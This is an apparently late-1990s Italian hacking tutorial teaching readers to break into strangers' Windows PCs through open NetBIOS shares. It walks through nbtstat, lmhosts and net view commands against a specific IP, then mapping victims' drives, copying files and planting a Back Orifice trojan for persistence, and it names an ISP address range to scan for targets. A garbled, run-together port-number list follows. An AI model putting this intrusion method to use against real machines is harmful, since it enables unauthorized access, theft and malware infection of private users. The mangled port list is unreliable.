Menu principale:
Hå¢kÎñG
#HACKING DEI COMPUTER NETBIOSSATI#
* Introduzione:
Il Netbios?? Che è?. Il Netbios è una cosina fatta da Microsfott ® che serve a sfruttare le reti locali LAN IPX. Dato che il nostro caro amico Bill è fissato con integrare tutto con internet ha integrato pure questo Netbios, rendendolo facilmente accessibile da chiunque via rete. Ma che simpatico questo nostro caro amico Bill.
* Configurazione del pc:
Per sfruttare le risorse di questa miniera d'oro chiamata netbios bisogna configurare il proprio pc con su montato winzozz ™. Eh si mi dispiace ma il caro sistema disoperativo del vecchio Bill è necessario. Ora andate nelle proprietà della vostra connessione di accesso remoto, in tipi di server, e mettete accedi alla rete. Fatto ciò andate in avvio/impostazioni/pannello di controllo/rete e aggiungete i seguenti client:
Client per reti microsoft
Client per reti netware (che automaticamente aggiungerà il protocollo compatibile IPX/SPX, se non lo fa fatelo voi)
E il protocollo Netbios.
Fatto ciò andate nelle proprietà del client per reti microsoft e selezionate connessione rapida, dopodiché nelle proprietà del protocollo compatibile IPX/SPX mettete attiva Netbios. Fate OK e dopo aver installato i driver (per i piratoni ci vuole il cd di windows) riavviate il pc. Ora siete pronti per fare kasino!!!
* Hacking dei computer Netbiossati:
Volendo fare un po' di teoria vi dirò che il Netbios lavora sulla porta 139 TCP/UDP (si proprio quella del winnuke).
Prima di tutto beccate un computer col sysadmin scemo e il Netbios attivo (come farlo ve lo spiego dopo). Vi faccio un esempio pratico così anche i più grulli capiscono come funziona la cosa (senza offesa per i più grulli hihi =)).
Allora io becco l'ip della macchina (212.216.34.144) poi vado nel prompt di msdos (evvivaa niente winzozz ™ per ora) e scrivo:
cd x:/windows
nbtstat -A 212.216.34.144
Vi risponderà:
NetBIOS Remote Machine Name Table
Name Type Status
----------------------------------------------------------------------------
HALL9000 <00> UNIQUE Registered
WORKGROUP <00> UNIQUE Registered
HALL9000 <03> UNIQUE Registered
HALL9000 <20> UNIQUE Registered
WORKGROUP <1E> UNIQUE Registered
A questo punto ci segniamo il primo nome della lista, HALL9000 (notate che nel Netbios tutto è scritto maiuscolo), e facciamo:
edit x:/windows/lmhosts
Nell'editor del dos scriviamo:
212.216.34.144 HALL9000 #PRE
Il tag #PRE è fisso e va sempre messo, gli spazi sono fatti col TAB (non usate altro). Salvate e uscite. Ora per caricare questo file scrivete:
nbtstat -R
Vi dovrebbe rispondere (se vi risponde altro o avete sbagliato a editare il file oppure avete configurato male il pc):
Successful purge and preload of the NBT Remote Cache Name Table.
Ora vediamo se ci sono risorse condivise nel pc. Fate:
net view //HALL9000
Se non ci sono risorse condivise o non si ha il permesso di accedervi vi risponderà con un errore, altrimenti vi dirà:
Risorse condivise su //HALL9000
Condivisione Tipo Commento
________________________________________________
C Disco
D Disco
E Disco
F Disco
G Disco
HP Stampa
Esecuzione comando riuscita.
Tombola!! Ci siamo abbiamo i nomi delle sue risorse condivise. Ora basta uscire dal dos e andare in gestione risorse (si avete letto bene). Nel menu in alto andate in Strumenti/Connetti unità di rete. Ora come avrete già capito si assegna una lettera al vostro "nuovo hd" che avrete (cioè l'hd dell'altro) e scrivete //HALL9000/C per esplorare la condivisione C (che probabilmente sarà il C: del tipo), //HALL9000/D per la condivisione D e così via. Avrete notato sicuramente che oltre ai vari dischi li c'è anche la condivisione HP di tipo "Stampa". Vuol dire semplicemente che quella condivisione è connessa alla stampante del tipo e potete stampare i vostri file con la sua stampante.. divertente no? =). Naturalmente sarà tutto abbastanza lento perché avverrà via internet, non sarà come esplorare i vostri hd di certo. Bene ora che sapete come accedere agli hd passiamo a cose più importanti. Prima di tutto vi chiederete come fare a prendere e a mettere file. E' semplice, dato che l'hd in remoto è come se fosse il vostro, quindi basta fare copia e incolla. Come fare invece per eseguire i file? Non è così semplice come pensiate, cliccando sul file .exe in remoto si eseguirà sul VOSTRO pc (ovviamente) quindi dovete giocare d'astuzia. Se volete mettere un trojan settatelo in modo da mandarvi una email con l'ip ogni volta che il pc va online, dopodiché mettete questo trojan in c:/windows/menu avvio/programmi/esecuzione automatica/ oppure in c:/windows/start menu/program files/startup (non ne sono sicuro però, non ho la versione inglese di windows). Poi fate in modo di riavviare il pc se è un server fisso, altrimenti aspettate il giorno dopo (per vedere se è un server guardate la lista di ID dell'nbtstat -A, se ce ne sono più di 4-5 allora probabilmente è server). Smurfatelo, nukkatelo, provate tutto. Consiglio di usare il BO dato che all'avvio si cancella da esecuzione automatica. Inoltre quando entrate con gestione risorse se il sysadmin è un po' furbo vi verrà chiesta una password (non preoccupatevi, ciò è molto raro). Exploits o un brute force per queste password purtroppo non ne conosco, se voi si allora mandatemi informazioni. Ultima cosa, quando i nomi degli ID o delle condivisioni contengono spazi dovete usare gli "". Ad esempio se con nbtstat -A troviamo il nome TRA LLA allora nel lmhosts dovremo scrivere:
numero_ip "TRA LLA" #PRE
E poi
net view "//TRA LLA"
E se vediamo che ha una condivisione chiamata BLA BLA allora faremo in gestione risorse:
"//TRA LLA/BLA BLA".
* Trovare i computer Netbiossati:
Questo è molto semplice, basta un programma chiamato Legion (lo trovate su http://rhino9.ml.org o al mio sito http://kalidor.tsx.org) che scanna dei range di ip. Io consiglio di provare sempre il dominio 212.216.* dato che ho scoperto che quella zona è strapiena di ip Netbiossati (infatti è la zona principale della TIN;-)).
* Ultima parola:
L'articolo è finito, spero sia stato esauriente, cmq se avete domande scrivetemi mailto:[email protected].
---Enzo~Hacker---
E QUESTE SONO UN Paio di porte da me testate
Keyword Decimal Description References
------- ------- ----------- ----------
0/tcp Reserved
0/udp Reserved
tcpmux 1/tcp TCP Port Service Multiplexer
tcpmux 1/udp TCP Port Service Multiplexer
compressnet 2/tcp Management Utility
compressnet 2/udp Management Utility
compressnet 3/tcp Compression Process
compressnet 3/udp Compression Process
# 4/tcp Unassigned#
4/udp Unassigned
rje 5/tcp Remote Job Entry
rje 5/udp Remote Job Entry
# 6/tcp Unassigned#
6/udp Unassigned
echo 7/tcp Echoecho
7/udp Echo
# 8/tcp Unassigned
# 8/udp Unassigneddiscard
9/tcp Discard
discard 9/udp Discard
# 10/tcp Unassigned#
10/udp Unassigned
systat 11/tcp Active Userssystat
11/udp Active Users
# 12/tcp Unassigned#
12/udp Unassigned
daytime 13/tcp Daytimedaytime
13/udp Daytime
# 14/tcp Unassigned#
14/udp Unassigned
# 15/tcp Unassigned [was netstat]
# 15/udp Unassigned#
16/tcp Unassigned
# 16/udp Unassignedqotd
17/tcp Quote of the Day
qotd 17/udp Quote of the Day
msp 18/tcp Message Send Protocol
msp 18/udp Message Send Protocol
chargen 19/tcp Character Generator
chargen 19/udp Character Generator
ftp-data 20/tcp File Transfer [Default Data]
ftp-data 20/udp File Transfer [Default Data]
ftp 21/tcp File Transfer [Control]
ftp 21/udp File Transfer [Control]
ssh 22/tcp secure shell
ssh 22/udp secure shell
telnet 23/tcp Telnet
telnet 23/udp Telnet
Telnet RFC 854
24/tcp any private mail system
24/udp any private mail system
smtp 25/tcp Simple Mail Transfer
smtp 25/udp Simple Mail Transfer
# 26/tcp Unassigned#
26/udp Unassigned
nsw-fe 27/tcp NSW User System FE
nsw-fe 27/udp NSW User System FE
# 28/tcp Unassigned#
28/udp Unassigned
msg-icp 29/tcp MSG ICPmsg-icp
29/udp MSG ICP
# 30/tcp Unassigned#
30/udp Unassigned
msg-auth 31/tcp MSG Authentication
msg-auth 31/udp MSG Authentication
# 32/tcp Unassigned#
32/udp Unassigned
dsp 33/tcp Display Support Protocol
dsp 33/udp Display Support Protocol
# 34/tcp Unassigned#
34/udp Unassigned
35/tcp any private printer server
35/udp any private printer server
# 36/tcp Unassigned#
36/udp Unassigned
time 37/tcp Timetime
37/udp Time
rap 38/tcp Route Access Protocol
rap 38/udp Route Access Protocol
rlp 39/tcp Resource Location Protocol
rlp 39/udp Resource Location Protocol
# 40/tcp Unassigned#
40/udp Unassigned
graphics 41/tcp Graphicsgraphics
41/udp Graphics
nameserver 42/tcp Host Name Server
nameserver 42/udp Host Name Servernicname
43/tcp Who Is
nicname 43/udp Who Ismpm-flags
44/tcp MPM FLAGS Protocol
mpm-flags 44/udp MPM FLAGS Protocol
mpm 45/tcp Message Processing Module [recv]
mpm 45/udp Message Processing Module [recv]
mpm-snd 46/tcp MPM [default send]
mpm-snd 46/udp MPM [default send]
ni-ftp 47/tcp NI FTP
ni-ftp 47/udp NI FTP
auditd 48/tcp Digital Audit Daemon
auditd 48/udp Digital Audit Daemon
login 49/tcp Login Host Protocol
login 49/udp Login Host Protocol
re-mail-ck 50/tcp Remote Mail Checking Protocol
re-mail-ck 50/udp Remote Mail Checking Protocol
la-maint 51/tcp IMP Logical Address Maintenance
la-maint 51/udp IMP Logical Address Maintenance
xns-time 52/tcp XNS Time Protocol
xns-time 52/udp XNS Time Protocol
domain 53/tcp Domain Name Server
domain 53/udp Domain Name Server
xns-ch 54/tcp XNS Clearinghouse
xns-ch 54/udp XNS Clearinghouse
isi-gl 55/tcp ISI Graphics Language
isi-gl 55/udp ISI Graphics Language
xns-auth 56/tcp XNS Authentication
xns-auth 56/udp XNS Authentication
57/tcp any private terminal access
57/udp any private terminal access
xns-mail 58/tcp XNS Mailxns-mail
58/udp XNS Mail
59/tcp any private file service
59/udp any private file service
60/tcp Unassigned
60/udp Unassigned
ni-mail 61/tcp NI MAILni-mail
61/udp NI MAIL
acas 62/tcp ACA Servicesacas
62/udp ACA Services
# 63/tcp Unassigned#
63/udp Unassigned
covia 64/tcp Communications Integrator (CI)
covia 64/udp Communications Integrator (CI)
tacacs-ds 65/tcp TACACS-Database Service
tacacs-ds 65/udp TACACS-Database Service
sql*net 66/tcp Oracle SQL*NET
sql*net 66/udp Oracle SQL*NET
bootps 67/tcp Bootstrap Protocol Server
bootps 67/udp Bootstrap Protocol Server
bootpc 68/tcp Bootstrap Protocol Client
bootpc 68/udp Bootstrap Protocol Client
tftp 69/tcp Trivial File Transfer
tftp 69/udp Trivial File Transfer
gopher 70/tcp Gophergopher
70/udp Gopher
netrjs-1 71/tcp Remote Job Service
netrjs-1 71/udp Remote Job Service
netrjs-2 72/tcp Remote Job Service
netrjs-2 72/udp Remote Job Service
netrjs-3 73/tcp Remote Job Service
netrjs-3 73/udp Remote Job Service
netrjs-4 74/tcp Remote Job Service
netrjs-4 74/udp Remote Job Service
75/tcp any private dial out service
75/udp any private dial out service
deos 76/tcp Distributed External Object Store
deos 76/udp Distributed External Object Store
77/tcp any private RJE service
77/udp any private RJE service
vettcp 78/tcp vettcpvettcp
78/udp vettcp
finger 79/tcp Finger
finger 79/udp Finger
www-http 80/tcp World Wide Web HTTP
www-http 80/udp World Wide Web HTTP
hosts2-ns 81/tcp HOSTS2 Name Server
hosts2-ns 81/udp HOSTS2 Name Server
xfer 82/tcp XFER Utilityxfer
82/udp XFER Utility
mit-ml-dev 83/tcp MIT ML Devicemit-ml-dev
83/udp MIT ML Device
ctf 84/tcp Common Trace Facility
ctf 84/udp Common Trace Facility
mit-ml-dev 85/tcp MIT ML Devicemit-ml-dev
85/udp MIT ML Device
mfcobol 86/tcp Micro Focus Cobol
mfcobol 86/udp Micro Focus Cobol
87/tcp any private terminal link
87/udp any private terminal link
kerberos 88/tcp Kerberos
88/udp Kerberos
su-mit-tg 89/tcp SU/MIT Telnet Gateway
su-mit-tg 89/udp SU/MIT Telnet Gateway
dnsix 90/tcp DNSIX Securit Attribute Token Map
dnsix 90/udp DNSIX Securit Attribute Token Map
mit-dov 91/tcp MIT Dover Spooler
mit-dov 91/udp MIT Dover Spooler
npp 92/tcp Network Printing Protocol
npp 92/udp Network Printing Protocol
dcp 93/tcp Device Control Protocol
dcp 93/udp Device Control Protocol
objcall 94/tcp Tivoli Object Dispatcher
objcall 94/udp Tivoli Object Dispatcher
supdup 95/tcp SUPDUPsupdup
95/udp SUPDUP
dixie 96/tcp DIXIE Protocol Specification
dixie 96/udp DIXIE Protocol Specification
swift-rvf 97/tcp Swift Remote Vitural File Protocol
swift-rvf 97/udp Swift Remote Vitural File Protocol
tacnews 98/tcp TAC Newstacnews
98/udp TAC News
metagram 99/tcp Metagram Relay
metagram 99/udp Metagram Relay
newacct 100/tcp [unauthorized use]